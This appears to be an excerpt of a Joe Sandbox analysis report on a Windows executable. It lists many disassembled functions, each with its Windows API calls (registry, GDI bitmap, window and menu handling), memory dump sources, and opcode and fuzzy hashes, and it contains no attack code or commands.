                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                                                                          • Opcode ID: bebc67e6ac53126d91a66c2ad088c2358fdcd7de892443af6bdd40b296447f6a
                                                                                                                                                                                                                                          • Instruction ID: f11e9c553961cb370b24fe629fe029a6cdf7b6d1218be145b1dc47d8803a71f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bebc67e6ac53126d91a66c2ad088c2358fdcd7de892443af6bdd40b296447f6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3411875600208AFDB119FA5DC48EAA7BB8FF89B15F104159F946E7260DB709941CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00141502
                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0014150B
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00141517
                                                                                                                                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001415FB
                                                                                                                                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00141657
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00141708
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0014178C
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001417D8
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001417E7
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00141823
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                          • API String ID: 1234038744-3931177956
                                                                                                                                                                                                                                          • Opcode ID: 13debfd175d5737dd3deabf689a647942c8b2a34e2b6d1c9ab4496f5901487d5
                                                                                                                                                                                                                                          • Instruction ID: 61914cc9487fe009b7ff303b209f3838fe9b82f79d536092ef272f712bfb17c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13debfd175d5737dd3deabf689a647942c8b2a34e2b6d1c9ab4496f5901487d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1D1F032A00219EFDB04AF65D885BF9B7B5BF46700F118056E446AF2A1DB70EC81DBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015B6F4
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015B772
                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0015B80A
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0015B87E
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0015B89C
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0015B8F2
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0015B904
                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0015B922
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0015B983
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015B994
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                          • Opcode ID: 0539d2800cab07a2f4dcf12b6a340ca571756c006c544ff2973b0bfad8efa831
                                                                                                                                                                                                                                          • Instruction ID: 91b2d92d814aedaff15ec02db0ba5cf24f45c3eed7221c5997ca9f335a018870
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0539d2800cab07a2f4dcf12b6a340ca571756c006c544ff2973b0bfad8efa831
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C16934208201EFD714DF14C495F6ABBE5AF84309F14859DF8AA8B7A2CB71E949CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001525D8
                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001525E8
                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 001525F4
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00152601
                                                                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0015266D
                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001526AC
                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001526D0
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001526D8
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001526E1
                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 001526E8
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 001526F3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                          • Opcode ID: a4d8d7095bd2bf27dc5e01d65025576ac1f3c69c84ce653be919fc408cbc9d1f
                                                                                                                                                                                                                                          • Instruction ID: 76ef47248937028d0373279e27f50c15273c8a8cc6497d2939b831dcdd7f9b6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d8d7095bd2bf27dc5e01d65025576ac1f3c69c84ce653be919fc408cbc9d1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE61D3B6D00219EFCF04CFA8DC84AAEBBB6FF58310F208529E955A7250D774A951CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0010DAA1
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D659
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D66B
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D67D
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D68F
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6A1
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6B3
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6C5
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6D7
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6E9
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6FB
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D70D
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D71F
                                                                                                                                                                                                                                            • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D731
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DA96
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DAB8
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DACD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DAD8
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DAFA
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB0D
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB1B
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB26
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB5E
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB65
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB82
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010DB9A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                          • Opcode ID: 98d79d8c10005bef5d4aa541699ba570037ddb60e0b8df68c608b42caf4e2ae7
                                                                                                                                                                                                                                          • Instruction ID: 957412ac51b83ce6087bf1d76a0386c25577445038dde112a02a530a1cf29146
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98d79d8c10005bef5d4aa541699ba570037ddb60e0b8df68c608b42caf4e2ae7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C312A316046099FEB21AAB9E849B5A77E9FF21314F254429E4C9D71D1DFB5EC40CB20
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0013369C
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001336A7
                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00133797
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0013380C
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0013385D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00133882
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 001338A0
                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 001338A7
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00133921
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0013395D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                                                                                                                          • String ID: %s%u
                                                                                                                                                                                                                                          • API String ID: 4010501982-679674701
                                                                                                                                                                                                                                          • Opcode ID: 31887be5407a677b5c8ef7956c02b9ab4479295103144d743a184ed0da15714c
                                                                                                                                                                                                                                          • Instruction ID: 526431bcbf59ceadf9513b7482a19aa16358da993a5a6fb57c1ba8a647a76a60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31887be5407a677b5c8ef7956c02b9ab4479295103144d743a184ed0da15714c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA91C471204606EFD719DF24C885BFAF7A8FF44354F008629FAA9D2190DB70EA45CBA5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00134954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00134994
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 001349DA
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001349EB
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 001349F7
                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00134A2C
                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00134A64
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00134A9D
                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00134AE6
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00134B20
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00134B8B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                          • Opcode ID: 1c24f84b75e1375d435bf1cbfbc35371dd0b0c30b1a9c975ae63bf88db6322e5
                                                                                                                                                                                                                                          • Instruction ID: 4f37a5b880c22bc0f397333456268dd1a07236d275ba9a387201f321365d1012
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c24f84b75e1375d435bf1cbfbc35371dd0b0c30b1a9c975ae63bf88db6322e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B91AF711042099FDB04DF14C985BBABBE8FF84314F04846AFD869A19ADB74FD45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00168D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00168D5A
                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00168D6A
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00168D75
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00168E1D
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00168ECF
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00168EEC
                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00168EFC
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00168F2E
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00168F70
                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00168FA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                          • Opcode ID: e867ccbb907cd37224137f50f2e6c905f7fb8710b3f551fc7fe1618e2da6b4a0
                                                                                                                                                                                                                                          • Instruction ID: 1d0343f0324aecd9a4ceb0a3587510b795a7ba32547c4e6dd7af0d6a3d6d0858
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e867ccbb907cd37224137f50f2e6c905f7fb8710b3f551fc7fe1618e2da6b4a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B81B071608301AFDB10CF24CC84ABBBBE9FB89314F044A5DF98597291DB71D951CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013BF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(001A1990,000000FF,00000000,00000030), ref: 0013BFAC
                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(001A1990,00000004,00000000,00000030), ref: 0013BFE1
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0013BFF3
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 0013C039
                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0013C056
                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 0013C082
                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0013C0C9
                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0013C10F
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013C124
                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013C145
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                          • Opcode ID: b21673f9620dbbb91fbbb69dafea7f4b16c152eaa873442e61b499137fde963f
                                                                                                                                                                                                                                          • Instruction ID: 6f9ffcb87e2e8031c3b93ac034356c730507ebf4f37342a8318688176f3cfd1d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b21673f9620dbbb91fbbb69dafea7f4b16c152eaa873442e61b499137fde963f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60618AB5A0028AEFDF15CF64CC88AFEBBB8EB05354F144015F951A3292DB71AD45DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0013DC20
                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0013DC46
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013DC50
                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0013DCA0
                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0013DCBC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
